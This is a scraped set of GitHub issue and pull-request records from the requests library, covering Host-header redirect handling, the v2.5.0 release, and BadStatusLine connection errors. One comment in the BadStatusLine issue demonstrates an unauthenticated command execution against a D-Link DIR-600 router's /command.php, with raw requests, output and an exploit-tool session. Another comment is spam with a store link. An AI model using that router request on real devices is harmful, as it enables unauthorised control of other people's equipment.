For example, when you set the `Host` header we change the way we handle cookies. However, the API doesn't have the flexibility for you to be able to set the boundary for your pre-existing knowledge. You can't say \"the Host header should be this value, but only if we aren't redirected off-host, and use the old host header for cookie values, but use the new host header to validate the TLS certificate\". That's just too complicated to specify.\n\nSo instead we just pick which of those we think will apply and _always_ apply it. This means you can easily work out what a redirect will look like from your original command line, we don't mutate it under your feet to remove the special knowledge. I value that kind of transparency.\n\nThe other option is to say \"sure, you know more than us, but the second you get redirected you don't\". That will work fine too. However, it pushes the problem onto different users. Users who like our current behaviour (\"leave Host set as-is\") will need to change their code, while you won't.\n\nI don't think either position is correct or right (though if @bagder has time I'd love his input on why cURL chose its behaviour), and in that sort of situation I will always prefer the status quo.\n\nI think this is \"working as intended\".\n", "First out, we (curl) picked our behavior many moons ago so this is something that has basically worked like this \"forever\" (since Sep 2004 to be exact). 
And to be clear: curl actually checks if the redirect is to a new host name and only then it disables the custom one, so if the redirect goes to the same host name as the original one it still allows the custom Host:.\n\nThe reason I went with this is that after a redirect that you allow curl to follow, you can basically not get the custom header done correctly if it goes to another host name, and it is causing harm more often than good to allow the custom one after a redirect-to-other-host.\n\nIn general in curl land, we've opted to \"sensible defaults\" and keeping it fairly simple when it comes to behaviors on followed redirects since we also make it very easy for users to do the entire redirect following \"manually\" and then they can opt to do whatever they please in all requests.\n", "If i request http://a.com/ with Host header 'a.com' and receive a redirect to http://www.a.com/, requests then issues a request to the server hosting www.a.com while specifying the host header 'a.com'. This creates an infinite redirect.\n\nIn what circumstance does this behavior work as intended? I can't see it solving anything if it maintains the Host header during a redirect to an entirely different domain. I've never seen another library/program which does this. This behavior makes no sense.\n", "@dieselmachine it's working as intended because users are not supposed to set the Host header and if they do then they need to understand that there are going to be big differences in behaviour in certain cases.\n", "Curl's behavior described in comment https://github.com/kennethreitz/requests/issues/2366#issuecomment-67457623 is very sensible thus what I would expect from _HTTP library for humans_. 
\n", "For reference, this is how easy it is to solve the problem with urllib2.\n\n```\nreq = urllib2.Request(url)\nreq.add_unredirected_header('Host', host)\nrsp = urllib2.urlopen(req)\n```\n\nIt is impossible to properly handle this situation in requests without disabling redirects and manually processing them by reading the location header and then issuing another request.\n\nWhen would a person ever want to send the original Host header to the host contained in the redirect location? Web browsers (made \"for humans\") will not send the same Host header after a redirect, because it would break things. I would expect a library \"for humans\" to handle things similarly.\n\nWhen would the default behavior NOT break something, is what I'm wondering. I can't see a single situation where this behavior would make things work.\n", "I'm increasingly inclined to agree with this logic. I'm struggling to see what pain we'd introduce by doing this for 3.0.0.\n" ]
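curl's behaviour described in the thread — keep a custom `Host:` only while the redirect stays on the same host — can be sketched as a small helper for anyone handling redirects manually with `allow_redirects=False`. The helper name here is illustrative, not part of any library API:

```python
from urllib.parse import urlparse

def headers_for_redirect(headers: dict, old_url: str, new_url: str) -> dict:
    """Drop a custom Host header when a redirect leaves the original host,
    mimicking the curl behaviour described in the thread."""
    new_headers = dict(headers)
    if urlparse(old_url).hostname != urlparse(new_url).hostname:
        new_headers.pop("Host", None)
    return new_headers

h = {"Host": "www.baidu.com", "User-Agent": "test"}
print(headers_for_redirect(h, "http://a.com/", "http://www.a.com/"))
# cross-host redirect: Host removed -> {'User-Agent': 'test'}
print(headers_for_redirect(h, "http://a.com/", "http://a.com/index.html"))
# same host: custom Host kept
```

This also avoids the infinite-redirect case mentioned above, where re-sending `Host: a.com` to the server for `www.a.com` triggers the same redirect forever.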
https://api.github.com/repos/psf/requests/issues/2365
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2365/labels{/name}
https://api.github.com/repos/psf/requests/issues/2365/comments
https://api.github.com/repos/psf/requests/issues/2365/events
https://github.com/psf/requests/pull/2365
50,590,904
MDExOlB1bGxSZXF1ZXN0MjUzMDYzNzM=
2,365
Release v2.5.0
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
[]
closed
true
{ "avatar_url": "https://avatars.githubusercontent.com/u/119893?v=4", "events_url": "https://api.github.com/users/kennethreitz/events{/privacy}", "followers_url": "https://api.github.com/users/kennethreitz/followers", "following_url": "https://api.github.com/users/kennethreitz/following{/other_user}", "gists_url": "https://api.github.com/users/kennethreitz/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/kennethreitz", "id": 119893, "login": "kennethreitz", "node_id": "MDQ6VXNlcjExOTg5Mw==", "organizations_url": "https://api.github.com/users/kennethreitz/orgs", "received_events_url": "https://api.github.com/users/kennethreitz/received_events", "repos_url": "https://api.github.com/users/kennethreitz/repos", "site_admin": false, "starred_url": "https://api.github.com/users/kennethreitz/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/kennethreitz/subscriptions", "type": "User", "url": "https://api.github.com/users/kennethreitz", "user_view_type": "public" }
[ { "avatar_url": "https://avatars.githubusercontent.com/u/119893?v=4", "events_url": "https://api.github.com/users/kennethreitz/events{/privacy}", "followers_url": "https://api.github.com/users/kennethreitz/followers", "following_url": "https://api.github.com/users/kennethreitz/following{/other_user}", "gists_url": "https://api.github.com/users/kennethreitz/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/kennethreitz", "id": 119893, "login": "kennethreitz", "node_id": "MDQ6VXNlcjExOTg5Mw==", "organizations_url": "https://api.github.com/users/kennethreitz/orgs", "received_events_url": "https://api.github.com/users/kennethreitz/received_events", "repos_url": "https://api.github.com/users/kennethreitz/repos", "site_admin": false, "starred_url": "https://api.github.com/users/kennethreitz/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/kennethreitz/subscriptions", "type": "User", "url": "https://api.github.com/users/kennethreitz", "user_view_type": "public" } ]
null
6
2014-12-01T23:04:05Z
2021-09-08T09:01:11Z
2014-12-01T23:22:17Z
CONTRIBUTOR
resolved
TODO: - [x] Tag release - [x] Upload to PyPI - [x] Create release on GitHub
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2365/reactions" }
https://api.github.com/repos/psf/requests/issues/2365/timeline
null
null
false
{ "diff_url": "https://github.com/psf/requests/pull/2365.diff", "html_url": "https://github.com/psf/requests/pull/2365", "merged_at": "2014-12-01T23:22:17Z", "patch_url": "https://github.com/psf/requests/pull/2365.patch", "url": "https://api.github.com/repos/psf/requests/pulls/2365" }
true
[ ":cake: LGTM.\n\nReady when you are @kennethreitz.\n", ":shipit: \n", "@kennethreitz wanted to get this out today and added both of us to PyPI as maintainers so I'm going to wrap this up right now.\n", "- [Tag](https://github.com/kennethreitz/requests/releases/tag/v2.5.0)\n- [Release](https://github.com/kennethreitz/requests/releases/tag/v2.5.0)\n- [PyPI](https://pypi.python.org/pypi/requests/2.5.0)\n", "omg you guys are the best\n", ":sparkles: :cake: :sparkles:\n" ]
https://api.github.com/repos/psf/requests/issues/2364
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2364/labels{/name}
https://api.github.com/repos/psf/requests/issues/2364/comments
https://api.github.com/repos/psf/requests/issues/2364/events
https://github.com/psf/requests/issues/2364
50,590,618
MDU6SXNzdWU1MDU5MDYxOA==
2,364
ConnectionError: ('Connection aborted.', BadStatusLine(""''''")) on Windows
{ "avatar_url": "https://avatars.githubusercontent.com/u/410872?v=4", "events_url": "https://api.github.com/users/greedo/events{/privacy}", "followers_url": "https://api.github.com/users/greedo/followers", "following_url": "https://api.github.com/users/greedo/following{/other_user}", "gists_url": "https://api.github.com/users/greedo/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/greedo", "id": 410872, "login": "greedo", "node_id": "MDQ6VXNlcjQxMDg3Mg==", "organizations_url": "https://api.github.com/users/greedo/orgs", "received_events_url": "https://api.github.com/users/greedo/received_events", "repos_url": "https://api.github.com/users/greedo/repos", "site_admin": false, "starred_url": "https://api.github.com/users/greedo/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/greedo/subscriptions", "type": "User", "url": "https://api.github.com/users/greedo", "user_view_type": "public" }
[]
closed
true
null
[]
null
31
2014-12-01T23:00:53Z
2018-10-20T11:29:28Z
2015-07-20T14:55:07Z
NONE
resolved
I am encountering this error when making a PUT request on Windows only, It works fine on *nix. ``` requests.put( https://upload.com, timeout=None, headers={ 'Content-Length': 28689538, 'Content-Range': 'bytes: 0-28689538/28689538', 'User-Agent': 'test' }, data=f) File "C:\Python27\lib\site-packages\requests\api.py", line 105, in put return request('put', url, data=data, **kwargs) File "C:\Python27\lib\site-packages\requests\api.py", line 49, in request return session.request(method=method, url=url, **kwargs) File "C:\Python27\lib\site-packages\requests\sessions.py", line 457, in request resp = self.send(prep, **send_kwargs) File "C:\Python27\lib\site-packages\requests\sessions.py", line 569, in send r = adapter.send(request, **kwargs) File "C:\Python27\lib\site-packages\requests\adapters.py", line 408, in send raise ConnectionError(err, request=request) ConnectionError: ('Connection aborted.', BadStatusLine("''",)) ```
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2364/reactions" }
https://api.github.com/repos/psf/requests/issues/2364/timeline
null
completed
null
null
false
[ "`BadStatusLine` is an exception coming out of the bowels of `httplib`, and it suggests that the data it receives doesn't make any sense. If I had to guess, I'd say that the obvious error is related to the TLS connection you're making. It would be interesting to see a packet capture (from tcpdump or wireshark) of this.\n", "I usually see this when a proxy terminates a HTTPS connection. It can't\nsend back headers, because it can't read the encrypted data going back and\nforth, so it sends back the empty string \"\". httplib attempts to parse \"\"\nas \"HTTP/1.x <status>\" and fails with the above message.\n\nHow long did it take to fail?\n\n## \n\nKevin Burke\nphone: 925.271.7005 | twentymilliseconds.com\n\nOn Mon, Dec 1, 2014 at 3:06 PM, Cory Benfield [email protected]\nwrote:\n\n> BadStatusLine is an exception coming out of the bowels of httplib, and it\n> suggests that the data it receives doesn't make any sense. If I had to\n> guess, I'd say that the obvious error is related to the TLS connection\n> you're making. It would be interesting to see a packet capture (from\n> tcpdump or wireshark) of this.\n> \n> —\n> Reply to this email directly or view it on GitHub\n> https://github.com/kennethreitz/requests/issues/2364#issuecomment-65152706\n> .\n", "@kevinburke it usually takes about a minute to fail.\n\nI've attached a few screenshots from wireshark. Let me know if a screenshot of something else might be more helpful.\n\n![initial](https://cloud.githubusercontent.com/assets/410872/5265689/49539ce0-7a12-11e4-9fea-fde29204fe43.png)\n\n![exchange](https://cloud.githubusercontent.com/assets/410872/5265696/5426e35c-7a12-11e4-85ee-e26cfc64c9db.png)\n\nThanks guys\n", "Are there any machine or proxies sittin in between the server and the\nclient? does the client machine have a default socket timeout configured?\n\nOn Tuesday, December 2, 2014, Joe Cabrera [email protected] wrote:\n\n> @kevinburke https://github.com/kevinburke it usually takes about a\n> minute to fail.\n> \n> I've attached a few screenshots from wireshark. Let me know if a\n> screenshot of something else might be more helpful.\n> \n> [image: initial]\n> https://cloud.githubusercontent.com/assets/410872/5265689/49539ce0-7a12-11e4-9fea-fde29204fe43.png\n> \n> [image: exchange]\n> https://cloud.githubusercontent.com/assets/410872/5265696/5426e35c-7a12-11e4-85ee-e26cfc64c9db.png\n> \n> Thanks guys\n> \n> —\n> Reply to this email directly or view it on GitHub\n> https://github.com/kennethreitz/requests/issues/2364#issuecomment-65253593\n> .\n\n## \n\n## \n\nKevin Burke\nphone: 925.271.7005 | twentymilliseconds.com\n", "@kevinburke there is a NAT sitting between the machine and the server, but no proxy.\n\nI am using a `(1,30)` timeout and my understanding is `requests` overrides whatever the client timeout defaults are.\n", "That's correct. Curious why it's taking a minute to time out if you set the\ntimeout to 30 seconds.\n\nOn Tuesday, December 2, 2014, Joe Cabrera [email protected] wrote:\n\n> @kevinburke https://github.com/kevinburke there is a NAT sitting\n> between the machine and the server, but no proxy.\n> \n> I am using a (1,30) timeout and my understanding is requests overrides\n> whatever the client timeout defaults are.\n> \n> —\n> Reply to this email directly or view it on GitHub\n> https://github.com/kennethreitz/requests/issues/2364#issuecomment-65262796\n> .\n\n## \n\n## \n\nKevin Burke\nphone: 925.271.7005 | twentymilliseconds.com\n", "@kevinburke it could be closer to 30 seconds, however I also make more than 1 request\n", "This error can also occur on Linux too, more descriptive errors messages would be useful for people trying to debug their code.\n", "Yeah :( unfortunately this specific error is thrown by httplib which is in\nthe standard library. We could rewrap it with a better message maybe\n\n## \n\nKevin Burke\nphone: 925.271.7005 | twentymilliseconds.com\n\nOn Thu, Dec 11, 2014 at 9:10 PM, Joe Cabrera [email protected]\nwrote:\n\n> This error can also occur on Linux too, more descriptive errors messages\n> would be useful for people trying to debug their code.\n> \n> —\n> Reply to this email directly or view it on GitHub\n> https://github.com/kennethreitz/requests/issues/2364#issuecomment-66733026\n> .\n", "It's already re-wrapped. We do not (and will not) do exception message introspection. It would be great if we had better messages in the stdlib but trying to get features into httplib is harder than pulling teeth.\n", "Thanks for the help all. I would like to pick up this error with the httplib team, but I'll go ahead and close the issue here for now.\n", "did you guys figure this one out? cc @dongnizh \n", "This error message can now be replaced with `RemoteDisconnected` see issue [23054](https://bugs.python.org/issue23054)\n", "@greedo Python 3.5 has not been released yet and this is not something we can just _replace_. http.client on Python 3.5 will raise RemoteDisconnected now instead of BadStatusLine (presumably in only _some_ cases) and that will be wrapped the same way that we currently wrap BadStatusLine.\n", "In my case it was the proxy (environment vars) issue which was causing the issue. `httpretty` was trying to use proxy and it was failing. Disabling my `proxy` by unsetting the environment variables fixed the issue.\n", "I've just hit this issue too in Python requests 2.8.1.\n\nIn my case I'm making a large number of periodic https requests to a apache2 server with connection keep-alive timeout 5s. There is a race between the server closing a timed out persistent connection and the client making a request on the same connection. Given a bit of network latency the client can often attempt to send a request on the socket before it gets notified it as been closed.\n\nGiven my application (testing an API) I'm going to handle the specific exception that results with a retry or two.\n", "```\n~ python -V\nPython 2.7.10\n```\n\n```\n~ python\nPython 2.7.10 (default, Oct 23 2015, 19:19:21)\n[GCC 4.2.1 Compatible Apple LLVM 7.0.0 (clang-700.0.59.5)] on darwin\nType \"help\", \"copyright\", \"credits\" or \"license\" for more information.\n>>> import requests;\n>>> resp = requests.Session().post('http://192.168.128.159:80/command.php', data='cmd=date +%Y%m%d')\nTraceback (most recent call last):\n File \"<stdin>\", line 1, in <module>\n File \"/Library/Python/2.7/site-packages/requests-2.10.0-py2.7.egg/requests/sessions.py\", line 518, in post\n return self.request('POST', url, data=data, json=json, **kwargs)\n File \"/Library/Python/2.7/site-packages/requests-2.10.0-py2.7.egg/requests/sessions.py\", line 475, in request\n resp = self.send(prep, **send_kwargs)\n File \"/Library/Python/2.7/site-packages/requests-2.10.0-py2.7.egg/requests/sessions.py\", line 585, in send\n r = adapter.send(request, **kwargs)\n File \"/Library/Python/2.7/site-packages/requests-2.10.0-py2.7.egg/requests/adapters.py\", line 453, in send\n raise ConnectionError(err, request=request)\nrequests.exceptions.ConnectionError: ('Connection aborted.', BadStatusLine(\"''\",))\n```\n\nIf **`headers={'Content-Type': 'application/x-www-form-urlencoded'}`** is set, everything goes well.\n\n```\n>>> resp = requests.Session().post('http://192.168.128.159:80/command.php', data='cmd=date +%Y%m%d', headers={'Content-Type': 'application/x-www-form-urlencoded'})\n>>> resp.text\nu'\\r\\n\\r\\n20000101\\n'\n```\n\n---\n\nIf you want details, please redirects to https://github.com/open-security/vulnpwn/pull/10\n\n```\nvulnpwn [master] ./vulnpwn\nvulnpwn > show modules\n[*]\n[*] exploits/linux/http/dlink_command_php_unauth_rce\n[*] exploits/multi/http/apache_struts_dmi_rce\n[*]\nvulnpwn > use exploits/linux/http/dlink_command_php_unauth_rce\nvulnpwn (exploits/linux/http/dlink_command_php_unauth_rce) > show options\n[*]\n[*] Option Current Setting Description\n[*] --------- --------------- ---------------------\n[*] TARGETURI /command.php target uri to request\n[*] RHOST 192.168.1.1 the target host\n[*] RPORT 80 the target port\n[*]\nvulnpwn (exploits/linux/http/dlink_command_php_unauth_rce) > set RHOST 192.168.128.159\n[*] SET => RHOST = (192.168.128.159)\nvulnpwn (exploits/linux/http/dlink_command_php_unauth_rce) > run\n[*] Exploiting - http://192.168.128.159:80/command.php\n[*] Target is vulnable\nvulnpwn (exploits/linux/http/dlink_command_php_unauth_rce) > exit\nvulnpwn > exit\n```\n", "@join-us Requests does not normally assume that plain text strings are form-encoded data. If you want them to be signaled as form-encoded, you need to pass a dictionary to data: `data={'cmd': 'date +%Y%m%d'}`. Alternatively, as you have done, you can set the header manually.\n", "Note that the _error_ you're encountering is the fault of the remote server, which is closing the connection without sending an error response. It shouldn't do that.\n", "Thanks @Lukasa. **`data={'cmd': 'date +%Y%m%d'}`** fails to receive command results, ex:\n\n```\n>>> resp = requests.Session().post('http://192.168.128.159:80/command.php', data='cmd=date +%Y%m%d', headers={'Content-Type': 'application/x-www-form-urlencoded'})\n>>> resp.text\nu'\\r\\n\\r\\n20000101\\n'\n>>> resp = requests.Session().post('http://192.168.128.159:80/command.php', data={'cmd': 'date +%Y%m%d'}, headers={'Content-Type': 'application/x-www-form-urlencoded'})\n>>> resp.text\nu'\\r\\n\\r\\n'\n```\n", "Hrgh.\n\nWhatever web server you're talking to is not very good. You see, requests will percent-encode data when sent using the dictionary form, so that the underlying string ends up looking like this: `'cmd=date+%2B%25Y%25m%25d'`. That's the correct form for data that is form-urlencoded: it's the _urlencode_ part of the thing! However, your server seems to want data that _advertises_ itself as form-urlencoded but _is not_ form-urlencoded. Your best bet, then, is going to be to continue to manually set the header yourself: the web server is just being stupid.\n", "@Lukasa I've tested this against **`D-LINK DIR-600`** routers\n\n## requests\n\n```\nPOST /command.php HTTP/1.1\nHost: 192.168.128.159\nConnection: keep-alive\nAccept-Encoding: gzip, deflate\nAccept: */*\nUser-Agent: python-requests/2.10.0\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 24\n\ncmd=date+%2B%25Y%25m%25dHTTP/1.1 200 OK\nServer: Linux, HTTP/1.1, DIR-600 Ver 2.11\nDate: Sat, 01 Jan 2000 14:44:49 GMT\nTransfer-Encoding: chunked\nContent-Type: text/html\n\n4\n\n\n\n0\n\n\n```\n\n## curl -- OK\n\n```\nPOST /command.php HTTP/1.1\nHost: 192.168.128.159\nUser-Agent: curl/7.43.0\nAccept: */*\nContent-Length: 16\nContent-Type: application/x-www-form-urlencoded\n\ncmd=date +%Y%m%dHTTP/1.1 200 OK\nServer: Linux, HTTP/1.1, DIR-600 Ver 2.11\nDate: Thu, 23 Mar 2000 15:18:23 GMT\nTransfer-Encoding: chunked\nContent-Type: text/html\n\nd\n\n\n20000323\n\n0\n```\n", "@join-us That provides no new information: curl isn't form encoding your data either. My advice in the previous post stands.\n", "OK, thanks.\n", "I had the same error.\nI'm using a SSH tunnel and for some reason with a delay of two seconds after tunnel establishment I could make the request correctly\n", "Hi! \n\nJust take a look at this stuff! There are so many beautiful things here, you should visit the store http://order.aliemresevik.com/e4ieej\n\nBests, ziney2y\n", "Currently able to reproduce this reliably on Fedora 24 (python2-requests-2.10.0-2.fc24), against multiple Apache httpd web servers. I can even reproduce against localhost with a carefully chosen delay.\n\nCode here: https://github.com/mikem23/keepalive-race\n", "@sigmavirus24 The reason `RemoteDisconnected` exception was added, is so that HTTP clients can safely retry (see [issue 3566](https://bugs.python.org/issue3566)).\r\nDon't you think the right behavior here is adding an automatic retry?", "@shoham-stratoscale presuming that the \"right behaviour\" is an automatic retry, that should be added to urllib3 (which actually handles the error), not requests.", "now my turn to try to handle this issue, and I'm trying to do a retry, like the following in my request session object:\r\n```\r\n requests_retry = Retry(total=10,\r\n read=2,\r\n method_whitelist=frozenset(['HEAD', 'GET', 'PUT', 'DELETE', 'OPTIONS', 'TRACE', 'POST'])\r\n )\r\n adapter = HTTPAdapter(max_retries=requests_retry)\r\n self.mount('http://', adapter)\r\n self.mount('https://', adapter)\r\n```\r\n\r\nthis actully works, but it open my code to retry on any read error what so ever. I want to make it specifc to this BadStatusLine\r\n\r\nsection 8.1.4 in https://www.w3.org/Protocols/rfc2616/rfc2616-sec8.html says this:\r\n\r\n> A client, server, or proxy MAY close the transport connection at any time. For example, a client might have started to send a new request at the same time that the server has decided to close the \"idle\" connection. From the server's point of view, the connection is being closed while it was idle, but from the client's point of view, a request is in progress.\r\n> \r\n> This means that clients, servers, and proxies MUST be able to recover from asynchronous close events. Client software SHOULD reopen the transport connection and retransmit the aborted sequence of requests without user interaction so long as the request sequence is idempotent (see section 9.1.2). Non-idempotent methods or sequences MUST NOT be automatically retried, although user agents MAY offer a human operator the choice of retrying the request(s). Confirmation by user-agent software with semantic understanding of the application MAY substitute for user confirmation. The automatic retry SHOULD NOT be repeated if the second sequence of requests fails.\r\n\r\nI want todo this automatic thing listed in the last line, but I think read errors group is a bit too wide to retry on. and in my case I have lots of failures cause by proxies disconnect on keep-alive timeouts in POST calls (i.e. maybe non-idempotent calls)\r\n\r\nnode.js has this package as a \"soultion\":\r\nhttps://www.npmjs.com/package/agentkeepalive\r\n\r\nso you can match the client timeouts to the proxies keep alive timeout, i.e. make the client hang-up before them.\r\nbut could found a way to achive this in requests/urllib3. \r\n\r\nI've looked into the Retry class thinking of subclassing it for this propose, but maybe i'm missing a better way here ?\r\n\r\n@Lukasa what do you think ? is that a good approch ? or i'm wasting my time on such a \"nitpick\" ? \r\n\r\nalso wondering is keep-alive not being used that heavily as I assumed, that people aren't facing this issues, or they aren't keeping long sessions at all ? or again, maybe i'm missing something here ?" ]
https://api.github.com/repos/psf/requests/issues/2363
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2363/labels{/name}
https://api.github.com/repos/psf/requests/issues/2363/comments
https://api.github.com/repos/psf/requests/issues/2363/events
https://github.com/psf/requests/pull/2363
50,586,064
MDExOlB1bGxSZXF1ZXN0MjUzMDQwMjM=
2,363
Update tests to work offline
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
[]
closed
true
null
[]
null
2
2014-12-01T22:25:44Z
2021-09-08T09:01:11Z
2014-12-03T04:46:10Z
CONTRIBUTOR
resolved
There are still some that we cannot force to work offline but this improves a lot of things.
{ "avatar_url": "https://avatars.githubusercontent.com/u/119893?v=4", "events_url": "https://api.github.com/users/kennethreitz/events{/privacy}", "followers_url": "https://api.github.com/users/kennethreitz/followers", "following_url": "https://api.github.com/users/kennethreitz/following{/other_user}", "gists_url": "https://api.github.com/users/kennethreitz/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/kennethreitz", "id": 119893, "login": "kennethreitz", "node_id": "MDQ6VXNlcjExOTg5Mw==", "organizations_url": "https://api.github.com/users/kennethreitz/orgs", "received_events_url": "https://api.github.com/users/kennethreitz/received_events", "repos_url": "https://api.github.com/users/kennethreitz/repos", "site_admin": false, "starred_url": "https://api.github.com/users/kennethreitz/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/kennethreitz/subscriptions", "type": "User", "url": "https://api.github.com/users/kennethreitz", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2363/reactions" }
https://api.github.com/repos/psf/requests/issues/2363/timeline
null
null
false
{ "diff_url": "https://github.com/psf/requests/pull/2363.diff", "html_url": "https://github.com/psf/requests/pull/2363", "merged_at": "2014-12-03T04:46:10Z", "patch_url": "https://github.com/psf/requests/pull/2363.patch", "url": "https://api.github.com/repos/psf/requests/pulls/2363" }
true
[ "Some of the tests you port to `httpbin()` use `http` and others use `https`, is that significant?\n", "@alex those tests that were using https didn't seem to have any necessity to rely on https. They were likely written by me and I just write `'https://httpbin.org'` everytime I want to talk to httpbin by force of habit.\n" ]
https://api.github.com/repos/psf/requests/issues/2362
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2362/labels{/name}
https://api.github.com/repos/psf/requests/issues/2362/comments
https://api.github.com/repos/psf/requests/issues/2362/events
https://github.com/psf/requests/issues/2362
50,566,424
MDU6SXNzdWU1MDU2NjQyNA==
2,362
Reduce bus factor
{ "avatar_url": "https://avatars.githubusercontent.com/u/119893?v=4", "events_url": "https://api.github.com/users/kennethreitz/events{/privacy}", "followers_url": "https://api.github.com/users/kennethreitz/followers", "following_url": "https://api.github.com/users/kennethreitz/following{/other_user}", "gists_url": "https://api.github.com/users/kennethreitz/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/kennethreitz", "id": 119893, "login": "kennethreitz", "node_id": "MDQ6VXNlcjExOTg5Mw==", "organizations_url": "https://api.github.com/users/kennethreitz/orgs", "received_events_url": "https://api.github.com/users/kennethreitz/received_events", "repos_url": "https://api.github.com/users/kennethreitz/repos", "site_admin": false, "starred_url": "https://api.github.com/users/kennethreitz/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/kennethreitz/subscriptions", "type": "User", "url": "https://api.github.com/users/kennethreitz", "user_view_type": "public" }
[]
closed
true
null
[]
null
12
2014-12-01T19:51:59Z
2021-09-08T23:06:51Z
2014-12-08T17:03:13Z
CONTRIBUTOR
resolved
Keys to the kingdom for @Lukasa and @sigmavirus24. This includes.... - [ ] DNSimple collab access] - [x] PyPi collab access I think that's it...
{ "avatar_url": "https://avatars.githubusercontent.com/u/119893?v=4", "events_url": "https://api.github.com/users/kennethreitz/events{/privacy}", "followers_url": "https://api.github.com/users/kennethreitz/followers", "following_url": "https://api.github.com/users/kennethreitz/following{/other_user}", "gists_url": "https://api.github.com/users/kennethreitz/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/kennethreitz", "id": 119893, "login": "kennethreitz", "node_id": "MDQ6VXNlcjExOTg5Mw==", "organizations_url": "https://api.github.com/users/kennethreitz/orgs", "received_events_url": "https://api.github.com/users/kennethreitz/received_events", "repos_url": "https://api.github.com/users/kennethreitz/repos", "site_admin": false, "starred_url": "https://api.github.com/users/kennethreitz/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/kennethreitz/subscriptions", "type": "User", "url": "https://api.github.com/users/kennethreitz", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2362/reactions" }
https://api.github.com/repos/psf/requests/issues/2362/timeline
null
completed
null
null
false
